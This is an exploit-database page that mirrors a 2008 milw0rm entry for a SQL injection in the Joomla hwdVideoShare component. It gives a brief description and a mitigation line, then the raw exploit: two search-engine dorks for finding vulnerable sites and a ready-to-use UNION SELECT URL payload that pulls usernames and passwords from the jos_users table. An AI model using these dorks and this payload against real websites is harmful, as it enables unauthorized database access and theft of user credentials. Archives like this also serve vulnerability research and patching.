header-logo
Suggest Exploit
vendor:
N/A
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

joomla SQL Injection(com_hwdvideoshare)+Powered by hwdVideoShare

An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, modify data, or execute system level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.
Source

Exploit-DB raw data:

###############################################################
#
# joomla SQL Injection(com_hwdvideoshare)+Powered by hwdVideoShare
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : Powered by hwdVideoShare
#
# DORK 2 : allinurl: com_hwdvideoshare
#
################################################################
EXPLOIT : SİMETiMES YOU NEED LOGiN

index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*

################################################################
# S@BUN             i AM NOT HACKER                   S@BUN
################################################################

# milw0rm.com [2008-02-20]